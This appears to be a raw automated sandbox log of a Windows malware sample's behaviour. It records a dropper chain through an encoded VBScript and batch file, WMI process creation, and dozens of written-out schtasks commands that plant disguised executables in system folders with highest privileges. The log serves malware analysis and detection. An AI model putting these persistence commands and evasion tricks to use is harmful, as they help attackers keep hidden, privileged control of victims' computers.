Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\LaRHzSijsq.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\LaRHzSijsq.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: LaRHzSijsq.exe

ReversingLabs: Detection: 57%

Source: unknown	Process created: C:\Users\user\Desktop\LaRHzSijsq.exe "C:\Users\user\Desktop\LaRHzSijsq.exe"
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process created: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe "C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe"
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WinSattl\9Jks4Q9248ljrax16iPG1ojfLKPqxh.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe "C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe"
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 11 /tr "'C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 6 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 14 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 7 /tr "'C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 12 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 9 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 13 /tr "'C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 11 /tr "'C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe"
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 7 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\Registry.exe"
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 13 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe
Source: unknown	Process created: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Documents\My Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Users\Public\Documents\My Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Documents\My Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zLSKhC92h1.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Process created: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe "C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WinSattl\9Jks4Q9248ljrax16iPG1ojfLKPqxh.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe "C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zLSKhC92h1.bat"	Jump to behavior
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process created: unknown unknown
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
